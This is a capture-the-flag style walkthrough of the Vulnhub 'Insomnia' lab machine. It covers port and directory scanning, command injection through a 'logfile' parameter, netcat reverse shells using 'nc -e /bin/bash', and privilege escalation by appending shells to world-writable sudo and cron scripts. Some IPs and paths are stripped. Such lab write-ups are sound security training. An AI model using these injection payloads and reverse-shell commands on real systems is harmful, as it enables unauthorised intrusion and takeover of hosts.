insomnia walkthrough vulnhub writeup

Insomnia Walkthrough – Vulnhub – Writeup

Insomnia is an easy machine from Vulnhub by alienum. We have to understand LFI, RCE, sudo abuse and cron job abuse to get to the root machine. Here, I will be doing the full method, i.e. getting the user flag first and then getting the root flag. However, once you get the foothold, you can directly go for the root access but this is not intended by the author. “Insomnia Walkthrough – Vulnhub – Writeup”.

Link to the machine:,644/

Walkthrough of Orasi machine by the same author

Identify the target

We have to identify the IP address of the target first.

fping -aqg

I got my IP address as and that of the target as

Scan the open ports

Next, we have to scan the open ports on the target so that we get the services that we can interact with.

sudo nmap -v -T4 -A -p- -oN nmap.log

There is only one port open. So, we might have to go deep and not wide which is easier in my view.

Enumerate the web server

The default page has a simple chat interface that works one way only.

When we do a directory scan, we can get new paths.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .html,.php,.txt -u -of html -o dir.html -fs 2899

The chat.txt path stored the chat messages.

However, the administration.php file had something interesting.

We can see from the screenshot above that it might be expecting something after the colon symbol. Then, I checked the chat page.

Here, we can see a line on the chatbox. So, we can guess that the file was expecting something. Therefore, I tried fuzzing the get parameter.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u '' -of html -o admin-get.html -fs 65

Luckily, we got a get parameter logfile that also allowed file inclusion and code execution.

Well, it’s not file inclusion but based on the file, it performed some operations. Thus, let’s try a different payload.


This gave the execution of the command whose results we can see on the chatbox. Hence, we can try spawning a reverse shell on port 9001.

# on local machine
nc -nlvp 9001

Let’s check if the target has netcat available.

?logfile=;which nc

Since it has netcat, we can connect to our port.

?logfile=;nc -e /bin/bash 9001

Finally, we got the foothold.

Upgrade to an intelligent reverse shell

Get a user’s access

Next, I checked the sudo permissions of the user www-data.

sudo -l

From the screenshot above, we can see that the user can execute a script without requiring a password as the user julia. So, I checked the permissions on the file.

cd /var/www/html
ls -al

It allowed other uses than the owner root to write on it. Therefore, I added the binary bash at the end of the script.

echo '/bin/bash' >>

So, now, if we execute the script as the user julia, we will also be executing bash as the same user.

sudo -u julia bash /var/www/html/

Finally, I got the user’s flag.

ls -al
cat user.txt

Root privilege escalation

When I looked at the crontab, I got a script being run every minute.

cat /etc/crontab

Then, we can check the permission of the script as well as we did for the previous script.

ls -l /var/cron/

It also had access to writing for other users. However, since this runs in the background, it’s better to spawn another reverse shell.

nc -nlvp 9002

So, I added the code to spawn a reverse shell on the script.

echo 'nc -e /bin/bash 9002' >> /var/cron/

After some time, I got the reverse shell. Finally, I got the root flag.

ls -al
cat root.txt

5 1 vote
Article Rating
Notify of
Newest Most Voted
Inline Feedbacks
View all comments